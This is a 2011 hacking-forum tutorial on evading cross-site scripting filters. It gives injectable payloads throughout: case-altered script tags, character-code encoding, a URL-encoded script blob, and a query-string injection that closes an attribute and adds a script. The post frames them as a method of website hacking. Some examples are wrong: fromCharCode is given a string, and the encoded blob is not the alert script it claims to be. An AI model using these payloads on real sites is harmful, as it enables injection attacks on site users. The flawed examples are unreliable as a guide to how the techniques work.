Tuesday, 2024-04-23, 3:39 PM
Welcome Guest

Sec_rity without U

Main | Bypassing XSS Filters - Forum | Registration | Login | RSS
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Hacks, Exploits & discussions » Website & Forum security » Bypassing XSS Filters (Bypassing XSS Filters)
Bypassing XSS Filters
kinggkongDate: Friday, 2011-12-23, 11:37 PM | Message # 1
Private
Group: Users
Messages: 6
Awards: 0
Reputation: 0
Status: Offline
Bypassing XSS Filters
For educational purposes only. I do not condone illegal activity.

Today I am going to teach you how to bypass cross site scripting filters. For our slow internet members like myself, cross site scripting filters are web masters sorry attempt at protecting their sites from XSS attacks. They work by not allowing certain words or characters that are known to be used in XSS attacks. I am going to go over some common filters, and the methods used to bypass them.

Word Filters: Word filters are designed to filter out certain words such as alert or script. Most are simple to bypass. To bypass these filters you can change the characters of the script.

Original...
Code
<script>alert('InterN0T')</script>
Change to...
Code:
<sCrIpT>aLeRt('InterN0T')</ScRiPt>

magic_quotes_gpc: This filter does not allow certain characters such as, " / and '. To bypass this filter we use: String.fromCharCode() We write our code inside () crypted in ASCII.

Original...
Code
<script>alert('InterN0T')</script>
Change to...
Code
<script>String.fromCharCode('InterN0T')</script>#'InterN0T' needs to be in ASCII form.
Coverting into full html: Sometimes filters will limit multiple characters including <. Most of the time you can bypass them by converting the string into full html.

Orignal...
Code
<script>alert('InterN0T')</script>
Change to...
code download
Code
%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%6
3%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%
73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C
%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3
D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%
6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64
%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%3
1%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%
61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E

Bypass by experimentation: Most filters can be bypassed. Sometimes you have to mess around with it. A lot of times you can just add "> before the script to close out current fields. Then inject it with...
Code
www.website.com/search.php?="><script>alert('InterN0T')</script>
This is a really simple tutorial on the most simple method of website hacking. I couldn't find any threads on InterN0T about bypassing XSS filters, so I thought I would contribute. Hope this helped.
 
Forum » Hacks, Exploits & discussions » Website & Forum security » Bypassing XSS Filters (Bypassing XSS Filters)
  • Page 1 of 1
  • 1
Search: